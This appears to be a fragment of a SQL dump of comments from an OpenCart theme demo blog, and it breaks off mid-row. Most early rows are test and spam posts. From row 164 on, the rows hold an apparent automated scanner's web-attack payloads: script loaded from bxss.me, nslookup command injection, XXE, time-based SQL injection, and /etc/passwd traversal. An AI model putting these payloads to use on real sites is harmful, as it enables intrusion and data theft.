(121, 2, 1, 0, 0, 'xxxxxxxxxxx', 'admin1@exxona.net', 'gdgdfgfdg', 'Welcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart ThemeWelcome to the Ultimate Opencart Theme', 0, '2015-08-15 15:42:07'),
(122, 1, 1, 0, 0, 'Miriam Lopez', 'miriamlopez@hotmail.com', 'miriamlopez.com', 'hola saludos desde mi México hermoso!!!', 0, '2015-08-18 06:15:00'),
(123, 0, 1, 0, 0, 'milly', 'what@me.com', '', 'weiryweiuryiwu weiruyweiury', 0, '2015-10-09 04:30:56'),
(124, 1, 1, 0, 3, 'bimbo', 'demo@thekrotek.com', '', 'Hola', 0, '2015-10-11 07:03:33'),
(125, 100, 1, 0, 0, 'Orlando', 'prisoner@hotmail.com', 'None', 'Great theme', 0, '2015-10-15 18:46:09'),
(126, 0, 1, 0, 0, 'Orlando', 'prisoner@hotmail.com', '', 'Great awesome theme', 0, '2015-10-15 18:47:12'),
(127, 0, 3, 0, 0, 'A', 'qwe@qwe.com', '', 'test', 0, '2015-11-10 17:29:42'),
(128, 0, 1, 0, 0, 'Sinan Altinok', 'no-email@gmail.com', 'www.JewelsOnYou.com', 'Thank you for such a great theme!', 0, '2015-11-13 19:54:23'),
(129, 1, 1, 0, 0, 'Norbert', 'test@test.hu', 'test.hu', 'Its a demo comment', 0, '2015-11-29 16:07:32'),
(131, 1, 1, 0, 3, 'asd', 'asd@asd.asd', '', 'sdaasas', 0, '2015-12-16 17:47:15'),
(132, 55, 7, 0, 0, 'hello', '1245@qq.com', 'http://journal.digital-atelier.com/1/', 'hello!', 0, '2015-12-23 05:48:30'),
(133, 55, 7, 0, 0, 'hello', '1245@qq.com', 'http://journal.digital-atelier.com/1/', 'hello!', 0, '2015-12-23 05:48:30'),
(134, 0, 1, 0, 0, '1', '1@test.com', 'test', 'cool!', 0, '2015-12-29 13:24:03'),
(136, 0, 1, 0, 0, 'test', 'test@test.com', 'test.com', 'test', 0, '2016-02-18 02:39:48'),
(137, 0, 1, 0, 0, 'test', 'test@test.com', 'www.test.com', 'test comment, test, journal 2', 0, '2016-03-09 17:49:36'),
(139, 0, 4, 0, 0, 'bg', 'bfb@mail.ru', 'rrb', 'eggggwwwwwww', 0, '2016-03-28 02:24:23'),
(140, 0, 4, 0, 0, 'cra', 'xerfx@mail.ru', '', '1111111111111111111111111', 0, '2016-03-28 02:24:54'),
(141, 0, 3, 0, 0, 'Wpm', 'Wpm@gmail.com', 'worldpapermoney.ru', 'Best Theme for Money!', 0, '2016-05-08 11:36:28'),
(142, 0, 3, 0, 0, 'Wpm', 'Wpm@gmail.com', 'worldpapermoney.ru', 'Best Theme for Money!', 0, '2016-05-08 11:36:28'),
(143, 55, 7, 0, 0, 'Davis', 'davis.xavier@yahoo.fr', '', 'This design is a piece of Art !', 0, '2016-05-18 21:15:28'),
(144, 0, 7, 0, 0, 'Martin', 'postuiterweermartin@gmail.com', 'www.clicbrillen.com', 'Looks fantastic. unlimited possibilities. Love it.', 0, '2016-06-07 15:03:16'),
(145, 0, 1, 0, 0, 'Nokia', 'humqud@gmail.com', 'www.myforexsignal.com', 'Great blog to see', 1, '2016-06-19 02:52:01'),
(146, 0, 4, 0, 0, 'Wedding flats', 'flatoutofheels194@gmail.com', 'https://www.flatoutofheels.com/', 'Awesome view of the sea .. nice theme really ..  &lt;a href = &quot;https://www.flatoutofheels.com/&quot;&gt;Wedding flats&lt;/a&gt;', 0, '2016-08-18 09:04:22'),
(147, 0, 3, 0, 0, 'Urban', 'info@kreativija.si', 'www.kreativija.si', 'Nice work, please keep up to be the best.', 0, '2016-08-22 11:56:48'),
(148, 0, 1, 390, 0, 'Binh Do', 'binhdn@gmail.com', 'test', 'test', 0, '2016-08-30 17:04:50'),
(149, 0, 1, 0, 3, 'test', 'info@example.com', '', 'test2', 0, '2016-09-24 09:17:20'),
(150, 0, 1, 0, 0, 'Mantas', 'nera@info.lt', 'www.imknuoalida.lt', 'Vyriškos odinės rankinės', 0, '2016-11-14 14:56:24'),
(151, 0, 1, 0, 0, 'Panel Interview', 'outreach@businessfirstfamily.com', 'https://businessfirstfamily.com/tips-for-conducting-a-successful-panel-interview/', 'Hey Journal,\r\n\r\nI love the new blog. It\'s got a great design that\'s easy to read. Hope to see more of your posts soon!\r\n\r\nDennis', 0, '2016-11-24 04:49:22'),
(152, 9, 1, 0, 0, 'Gjfdhh', 'Fjdgjd@yidg.bnk', 'Thanx.mnk', 'Dr h hd rt I gf eggs ur rt I t UK is et jb rt yug st tum kis ke luis jaise him toh tum ko make', 0, '2016-12-03 08:55:58'),
(153, 0, 4, 0, 0, 'tunckol', 'iasdnfo@tusadasdnckol.com', 'www.tunckol.com', 'https://www.tunckol.com/ saat telefon cep telefonu', 0, '2017-01-04 02:21:29'),
(154, 0, 4, 0, 0, 'Bileklik', 'infsdfsdfo@tundsfsfdckol.com', 'www.tunckol.com', 'https://www.tunckol.com/ saat telefon cep telefonu', 0, '2017-01-04 02:22:14'),
(155, 38, 4, 0, 0, 'Bileklik', 'idfnfo@tuncdfdkol.com', 'www.tunckol.com', 'https://www.tunckol.com/ saat telefon cep telefonu', 0, '2017-01-04 02:22:28'),
(156, 0, 4, 0, 0, 'Paweł', 'pavvel.be@gmail.com', '', 'Perfect theme. Good job!', 0, '2017-01-05 14:37:30'),
(157, 0, 1, 0, 0, 'K,K,', 'luisescajeda@gmx.com', '', 'swdg', 0, '2017-01-20 02:24:24'),
(158, 0, 4, 0, 0, '3124', 'sdf@sf.com', '', 'sdfsfd', 0, '2017-01-24 18:50:07'),
(159, 0, 1, 0, 0, 'fdgdf', 'gdfg@dd.com', '', 'dfg', 0, '2017-02-15 03:47:00'),
(160, 0, 1, 0, 0, 'Petrov', 'office@lensmarket.bg', 'www.lensmarket.bg', 'contact lenses online', 0, '2017-03-26 00:30:49'),
(161, 97, 1, 0, 0, 'Deneme', 'Deneme@djdj.com', '', 'Hxhdhddh', 0, '2017-04-02 22:20:29'),
(162, 0, 1, 0, 0, 'elliot', 'aaa@hotmail.com', '', 'avasome', 0, '2017-04-08 22:47:38'),
(164, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'response.write(9993588*9916315)', 0, '2017-10-24 18:29:54'),
(165, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'+response.write(9993588*9916315)+\'', 0, '2017-10-24 18:29:55'),
(166, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&quot;+response.write(9993588*9916315)+&quot;', 0, '2017-10-24 18:29:55'),
(167, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;/script&gt;&lt;svg/onload=\'+/&quot;/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\\/s?u=002626&amp;r=32912-731&amp;h=32912-d57d8-2&amp;/).slice(2),document.documentElement.appendChild(s))//\'&gt;', 0, '2017-10-24 18:30:01'),
(168, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&gt;&quot;&gt;&lt;script src=http://bxss.me/s?u=002626&amp;r=32912-733&amp;h=32912-d57d8-1&gt;&lt;/script&gt;&lt;tcpdf method=&quot;addTTFFont&quot; params=&quot;%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,002626,32912-733,32912,d57d8,%22%5D&quot;/&gt;', 0, '2017-10-24 18:30:02'),
(169, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'JukGlaGv', 0, '2017-10-24 18:30:03'),
(170, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${9999667+9999974}', 0, '2017-10-24 18:30:08'),
(171, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'bcc:002626.32912-748.32912.d57d8.1@bxss.me', 0, '2017-10-24 18:30:08'),
(172, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'to@example.com&gt;\r\nbcc:002626.32912-750.32912.d57d8.1@bxss.me', 0, '2017-10-24 18:30:11'),
(173, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'set|set&amp;set', 0, '2017-10-24 18:30:13'),
(174, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '$(nslookup dns.ce.\\002626.32912-755.32912.d57d8.\\1.bxss.me)', 0, '2017-10-24 18:30:18'),
(175, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '', 0, '2017-10-24 18:30:20'),
(176, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg', 0, '2017-10-24 18:30:20'),
(177, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&amp;nslookup dns.ce.\\002626.32912-760.32912.d57d8.\\1.bxss.me&amp;\'\\&quot;`0&amp;nslookup dns.ce.\\002626.32912-760.32912.d57d8.\\1.bxss.me&amp;`\'', 0, '2017-10-24 18:30:20'),
(178, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1some_inexistent_file_with_long_name\\0.jpg', 0, '2017-10-24 18:30:21'),
(179, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'Http://testasp.vulnweb.com/t/fit.txt', 0, '2017-10-24 18:30:21'),
(180, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&amp;n927573=v931197', 0, '2017-10-24 18:30:21'),
(181, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://testasp.vulnweb.com/t/fit.txt?.jpg', 0, '2017-10-24 18:30:22'),
(182, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'testasp.vulnweb.com', 0, '2017-10-24 18:30:23'),
(183, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '', 0, '2017-10-24 18:30:29'),
(184, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ')', 0, '2017-10-24 18:30:29'),
(185, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '!(()&amp;&amp;!|*|*|', 0, '2017-10-24 18:30:30'),
(186, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;()', 0, '2017-10-24 18:30:30'),
(187, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '^(#$!@#$)(()))******', 0, '2017-10-24 18:30:31'),
(188, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://testasp.vulnweb.com/t/xss.html?%00.jpg', 0, '2017-10-24 18:30:34'),
(189, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://hitqi1HH0Vzm6.bxss.me/', 0, '2017-10-24 18:30:36'),
(190, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ';print(md5(acunetix_wvs_security_test));', 0, '2017-10-24 18:30:36'),
(191, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\';print(md5(acunetix_wvs_security_test));$a=\'', 0, '2017-10-24 18:30:37'),
(192, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&quot;;print(md5(acunetix_wvs_security_test));$a=&quot;', 0, '2017-10-24 18:30:37'),
(193, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${@print(md5(acunetix_wvs_security_test))}', 0, '2017-10-24 18:30:38'),
(194, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php', 0, '2017-10-24 18:30:38'),
(195, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${@print(md5(acunetix_wvs_security_test))}\\', 0, '2017-10-24 18:30:38'),
(196, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))', 0, '2017-10-24 18:30:39'),
(197, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php', 0, '2017-10-24 18:30:39'),
(198, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php/.', 0, '2017-10-24 18:30:39'),
(199, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1', 0, '2017-10-24 18:30:40'),
(200, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1', 0, '2017-10-24 18:30:40'),
(201, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WHZGeVa9', 0, '2017-10-24 18:30:41'),
(202, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\r\n&lt;!DOCTYPE acunetix [\r\n  &lt;!ENTITY acunetixent SYSTEM &quot;http://hitiQx3vKQ0yF.bxss.me/&quot;&gt;\r\n]&gt;\r\n&lt;xxx&gt;&amp;acunetixent;&lt;/xxx&gt;', 0, '2017-10-24 18:30:41'),
(203, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1 OR 2+757-757-1=0+0+0+1 --', 0, '2017-10-24 18:30:41'),
(204, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\r\n  &lt;!DOCTYPE roottag PUBLIC &quot;-//VSR//PENTEST//EN&quot; &quot;http://hitipw5kqDD0K.bxss.me/&quot;&gt;\r\n&lt;roottag&gt;acunetix&lt;/roottag&gt;', 0, '2017-10-24 18:30:42'),
(205, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1 OR 2+119-119-1=0+0+0+1', 0, '2017-10-24 18:30:42'),
(206, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1\' OR 2+859-859-1=0+0+0+1 --', 0, '2017-10-24 18:30:42'),
(207, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;xi:include href=&quot;http://hitOONHfsqzUU.bxss.me/&quot; parse=&quot;text&quot;/&gt;', 0, '2017-10-24 18:30:43'),
(208, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1\' OR 2+953-953-1=0+0+0+1 or \'5qbKpRkv\'=\'', 0, '2017-10-24 18:30:43'),
(209, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\r\n&lt;!DOCTYPE foo [\r\n&lt;!ELEMENT foo ANY &gt;\r\n&lt;!ENTITY % xxe SYSTEM &quot;http://hitF9735XFmuc.bxss.me/&quot;&gt;\r\n%xxe;\r\n]&gt;', 0, '2017-10-24 18:30:43'),
(210, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1&quot; OR 2+320-320-1=0+0+0+1 --', 0, '2017-10-24 18:30:43'),
(211, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'if(now()=sysdate(),sleep(3),0)/*\'XOR(if(now()=sysdate(),sleep(3),0))OR\'&quot;XOR(if(now()=sysdate(),sleep(3),0))OR&quot;*/', 0, '2017-10-24 18:30:44'),
(212, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\r\n&lt;!DOCTYPE body SYSTEM &quot;http://hit2IAssTSArn.bxss.me/&quot;&gt;\r\n&lt;body&gt;&lt;method&gt;test&lt;/method&gt;&lt;/body&gt;', 0, '2017-10-24 18:30:44'),
(213, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '(select(0)from(select(sleep(6)))v)/*\'+(select(0)from(select(sleep(6)))v)+\'&quot;+(select(0)from(select(sleep(6)))v)+&quot;*/', 0, '2017-10-24 18:30:44'),
(214, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/www.vulnweb.com', 0, '2017-10-24 18:30:44'),
(215, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1; waitfor delay \'0:0:6\' --', 0, '2017-10-24 18:30:45'),
(216, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1); waitfor delay \'0:0:6\' --', 0, '2017-10-24 18:30:45'),
(217, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1 waitfor delay \'0:0:9\' --', 0, '2017-10-24 18:30:46'),
(218, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'BdGVP3jc\'; waitfor delay \'0:0:9\' --', 0, '2017-10-24 18:30:46'),
(219, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1;select pg_sleep(9); --', 0, '2017-10-24 18:30:47'),
(220, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1);select pg_sleep(3); --', 0, '2017-10-24 18:30:47'),
(221, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\'&quot;', 0, '2017-10-24 18:30:47'),
(222, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1));select pg_sleep(3); --', 0, '2017-10-24 18:30:48'),
(223, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\\', 0, '2017-10-24 18:30:48'),
(224, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'MN5o2Rct\';select pg_sleep(3); --', 0, '2017-10-24 18:30:48'),
(225, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;', 0, '2017-10-24 18:30:48'),
(226, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '@@FCwaj', 0, '2017-10-24 18:30:49'),
(227, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'E6r8w6q4\');select pg_sleep(3); --', 0, '2017-10-24 18:30:49'),
(228, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;!--', 0, '2017-10-24 18:30:49'),
(229, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'n7KTUVnS\'));select pg_sleep(3); --', 0, '2017-10-24 18:30:49'),
(230, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'JyI=', 0, '2017-10-24 18:30:50'),
(231, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.002626.32912-788.32912.d57d8.1.bxss\'||\'.me\')', 0, '2017-10-24 18:30:51'),
(232, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.002626.32912-790.32912.d57d8.1.bxss\'||\'.me\')||\'', 0, '2017-10-24 18:30:54'),
(233, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1;copy (select \'\') to program \'nslookup dns.sqli.\\002626.32912-793.32912.d57d8.\\1.bxss.me\'', 0, '2017-10-24 18:30:58'),
(234, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\';copy (select \'\') to program \'nslookup dns.sqli.\\002626.32912-795.32912.d57d8.\\1.bxss.me', 0, '2017-10-24 18:31:00'),
(235, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '829\'', 0, '2017-10-24 18:31:01'),
(236, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../etc/passwd', 0, '2017-10-24 18:31:01'),
(237, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../../../../../../proc/version', 0, '2017-10-24 18:31:02'),
(238, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg', 0, '2017-10-24 18:31:04'),
(239, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../etc/passwd\\0.jpg', 0, '2017-10-24 18:31:05'),
(240, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg', 0, '2017-10-24 18:31:05'),
(241, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/../..//../..//../..//../..//../..//etc/passwd\\0.jpg', 0, '2017-10-24 18:31:06'),
(242, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd', 0, '2017-10-24 18:31:08'),
(243, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/etc/passwd', 0, '2017-10-24 18:31:10'),
(244, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '%2fetc%2fpasswd', 0, '2017-10-24 18:31:11'),
(245, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/.././.././.././.././.././.././.././../etc/./passwd%00', 0, '2017-10-24 18:31:12'),
(246, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd', 0, '2017-10-24 18:31:13'),
(247, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd', 0, '2017-10-24 18:31:14'),
(248, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.', 0, '2017-10-24 18:31:14'),
(249, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'file:///etc/passwd', 0, '2017-10-24 18:31:15'),
(250, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/\\../\\../\\../\\../\\../\\../\\../etc/passwd', 0, '2017-10-24 18:31:15'),
(251, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF/web.xml', 0, '2017-10-24 18:31:16'),
(252, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/WEB-INF/web.xml', 0, '2017-10-24 18:31:17'),
(253, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF\\web.xml', 0, '2017-10-24 18:31:18'),
(254, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../windows/win.ini', 0, '2017-10-24 18:31:18'),
(255, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts', 0, '2017-10-24 18:31:19'),
(256, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../windows/win.ini\\0.jpg', 0, '2017-10-24 18:31:19'),
(257, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '................windowswin.ini', 0, '2017-10-24 18:31:21'),
(258, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini', 0, '2017-10-24 18:31:22'),
(259, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini', 0, '2017-10-24 18:31:22'),
(260, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini', 0, '2017-10-24 18:31:23'),
(261, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini', 0, '2017-10-24 18:31:24'),
(262, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.